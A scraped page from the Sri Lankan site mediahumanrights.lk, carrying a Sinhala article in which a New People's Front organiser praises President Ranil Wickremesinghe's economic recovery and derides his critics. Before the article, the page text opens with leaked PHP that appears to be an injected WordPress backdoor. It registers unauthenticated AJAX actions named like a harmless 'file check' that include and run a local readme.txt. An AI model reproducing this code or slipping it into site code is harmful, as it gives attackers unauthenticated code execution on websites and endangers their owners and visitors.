if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } කුහකනායක හා රොටී කල්ලිය ජනාධිපතිට බනිනවා.. - mediahumanrights.lk
mediahumanrights.lk
Local News News

කුහකනායක හා රොටී කල්ලිය ජනාධිපතිට බනිනවා..

‘සාම්ප්‍රදායික දේශපාලන මතවාදයන්ගෙන් මිදී පක්ෂ දේශපාලනයෙන් එහාට ගිහින් රට ගැන හිතන මිනිස්සුන්ට එකතුවෙන්න පුළුවන් තැනක අවශ්‍යතාවයක් ශ්‍රී ලාංකික දේශපාලනය තුල කාලයක් තිස්සේ තියෙනවා. අපිත් තැන් හොයමින් විවිධ පක්ෂ, කණ්ඩායම් සමඟ දේශපාලනය කළා. ඒ හැම තැනකම අපේ මතවාදයට, අපේ හීන වලට, අපේ මිනිස්සුන්ගෙ බලාපොරොත්තු වලට ඉඩක් තිබුණෙ නැහැ’ යනුවෙන් පසුගියදා නව ජනතා පෙරමුණ මහරගම ආසන බලමණ්ඩලය අමතමින් සුගීෂ්වර බණ්ඩාර මහතා කියා සිටියා.

වැඩිදුරටත් අදහස් දක්වමින් ඔහු කියාසිටියේ,

‘අපිට එහෙම එක එක පුද්ගලයන්ගේ පෞද්ගලික අරමුණු වලට යට වෙලා දේශපාලනය කරන්න වුවමනාවක් නෑ, දේශපාලනය ව්‍යාපාරයක් කරගත්තු මිනිස්සු පස්සේ යන්න අපිට අවශ්‍යතාවක් නෑ.

ඒ නිසා අපි තීරණය කළා රටට ඔබින, ජනතාවට ගැලපෙන තැනක ඉදන් දේශපාලනය කරන්න. එහෙම ආපු ගමනෙදි අද අපිට සෙවණ දෙන මහා වෘක්ෂය තමයි ඔබත් මමත් ඇතුළුව අපි හැමෝගෙම නවාතැන වුන “නව ජනතා පෙරමුණ” කියන මෑත කාලයේ ඉතා වේගයෙන් ජනප්‍රිය වුන මේ අපේ පක්ෂය. මේක ඇතුලෙ තියෙනව ඔබට අපිට ලස්සන රටක් ගොඩනගන හීනයට යන සැලැස්ම. මේ රට හමුවේ ඇති ප්‍රධාන අභියෝග හදුනාගෙන ආර්ථික වශයෙන් ශක්තිමත්, කලාපීය වශයෙන් ශක්තිමත්, නොබැදි විදේශ ප්‍රතිපත්තියක් සමඟ අපි ඉදිරියට යන්නෙ කොහොමද කියල අපි අපේ පක්ෂ ප්‍රතිපත්තිය එළි දක්වමින් නුදුරේදීම කියන්න බලාපොරොත්තු වෙනවා.

අපිට අවශ්‍යයි මේ රටේ විතරක් නෙමෙයි, මුළු ලෝකය හමුවේ ඇති අභියෝග ජය ගන්න පුළුවන් තරුණ පරම්පරාවක්. අපේ බොහොමයක් අය හිතුවට අපි රට ඇතුලෙ කොහොමද දිනන්නෙ කියල, අපි පක්ෂයක් විදියට හිතන්නෙ රටක් විදියට ලෝකය ජය ගන්නෙ කොහොමද කියල, එතන තමයි නව ජනතා පෙරමුණ අනෙක් පක්ෂ වලින් වෙනස් වෙන තැන කියලා කියන්න පුළුවන්.

අන්තිමට අපේ රට දිනවන එකයි අපේ පැතුම, ඒ නිසාම අපි “අපරාජිත රටක්” කියන තේමාව මූලික කරගෙන වැඩකටයුතු කරමින් ඉදිරියට යනවා.

අපි මේ රටේ දේශපාලනය කරන්න සැලසුම් කරන්නෙ රටේ සාමාන්‍ය කටයුතු කඩාකප්පල් කරල රට අරාජිකත්වයට රට තල්ලු කරන්න නෙවෙයි. රටේ කුමන දේශපාලන බලවේගයක් උනත් රටට හිතකර යම් ප්‍රතිපත්තිමය තීරණයක් අරගෙන තියෙනවා නම් අපි ඒකට කොන්දේසි විරහිතව සහාය පළකරනවා.

සමහර දේශපාලන බලවේග වලට රටට මොනවා කළත් වැරදි විදිහටම තමයි පේන්නේ. උන්ගෙ හෙන්චයියො ටිකක් අරන් කොළඹ එනවා පාරවල් වහන්න. මොකක්ද ඒ කාළකණ්ණි දේශපාලනය, එහෙම කරලා රටක් ගොඩදාන්න පුළුවන් ද?

පසුගිය දා කුහකනායක පාර්ශ්වයත් සහ ජාතිකවාදී කියන රොටී කල්ලියත් රනිල් වික්‍රමසිංහ ජනාධිපතිතුමා විසින් මේ මොහොතේ රටට වැදගත් කථාවක් කළාම ඒක විවේචනය කළේ කුහකකම වගේම, වැරැද්දම දකින නිසා කියලා මම හිතන්නේ, රනිල් වික්‍රමසිංහ රට මේ වෙනකොට ගෙනැල්ලා තියෙන තැන කාටත් හොදින් පේනවා කියලා මම හිතනවා.

ලෝකයේ රටවල් ණය වුනා කියල ඒ රටවල් එකපාරම කඩාගෙන වැටෙන්නේ නෑ. නිසි දැනුමක්, අත්දැකීමක් සහිත නායකෙයෝ රටක් පාලනය කරනවා නම් රටක් ගොඩදාන්න බැරිවෙන්නේ නෑ කියලා තමයි අපි කියන්නේ.

පක්ෂයක් විදියට අපි කියන්නේ රටට වාසියදායක විදියේ ණය යෝජනා පිළිගෙන එමඟින් රටට ලැබෙන මුදල් සඵලදායී ව්‍යාපෘති සඳහා යෙදවීමත්, රටේ දළ දේශීය නිෂ්පාදනය ඉහල නැංවීමත් කළ යුතුයි කියන එක.

කොරෝනා වසංගතයත් සමග කඩා වැටුණු ආර්ථිකය හිතුවට වඩා ඉක්මනින් ලෝකයේ ආර්ථික විද්වතුන් පවා පුදුමයට පත් කරමින් අද ශ්‍රී ලංකාව අළු ගසාදාලා නැගිටලා තියෙනවා.

රටේ පුරවැසියන් විදිහට 2022 අපි හිටියේ කොහොමද කියලා පොඩ්ඩක් මතක් කළොත්, අද තත්ත්වය ඊට හාත්පසින්ම වෙනස්, ප්‍රපාතයට ගියපු රට තිරිංග තද කරගෙන රනිල් වික්‍රමසිංහ ජනාධිපතිතුමා රටට සුබ පණිවිඩයක් අරගෙන ඇවිල්ලා තියෙනවා.

විදේශ සංචාරකයින්ගේ පැමිණීම වැඩි වෙලා, කෘෂි කාර්මික, කාර්මික, සේවා යන අංශ තුනේම පිබිදීමක් ඇති වෙලා, දළ දේශීය නිෂ්පාදනය ඉහල ගිහින්, වෙළද හිගය අඩු වෙලා, මහ බැංකු සංචිත ඩොලර් බිලියන පහකට ආසන්න වෙලා, මිනිස්සුන්ගෙ ඒක පුද්ගල ආදායම යම්තරමකට වැඩි වෙලා,

ඒක නෙමෙයි ද රටට, ජනතාවට සුබ වෙන පණිවිඩය, එබැවින් ඔබත් මමත් පතන අපරාජිත රටක් කරා මව්බිම ගෙනයන ගමනට ශක්තියක් වෙන්නැයි ඉල්ලා සිටිනවා යනුවෙන් ඔහු කියා සිටියා

– Media unit

Related posts

රට අස්ථාවර කිරීමේ කුමන්ත්‍රණයට ඇමතිවරුත් සම්බන්ධයි…

Shiran Viraj

නිදා ගන්නේ ජංගම දුරකතනය ඇදේ තියලද

Shiran Viraj

What is lampshading? The leggy fashion trend, explained

Shiran Viraj